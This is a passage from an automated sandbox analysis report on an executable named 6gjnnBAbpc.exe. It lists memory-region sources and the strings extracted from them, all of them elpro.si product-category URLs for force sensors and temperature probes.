6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/natezna-merilna-celica/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/obrocni-pretvorniki-sile/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/posebni-pretvorniki-sile/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-nagiba/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-sile-napetosti-kompresije/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-tlacne-sile/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/upogibni-nosilci-strizni-nosilci/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/temperat
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/cryo-temp-temperaturna-tipala-za-z
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/digital-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/dodatna-oprema-za-temperaturna-tip
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/ex-temperaturna-tipala-z-atex-cert
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/field-mounted-temperaturna-tipala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 